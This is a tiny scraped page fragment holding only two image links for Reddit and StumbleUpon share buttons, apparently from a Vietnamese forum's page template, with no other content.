![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")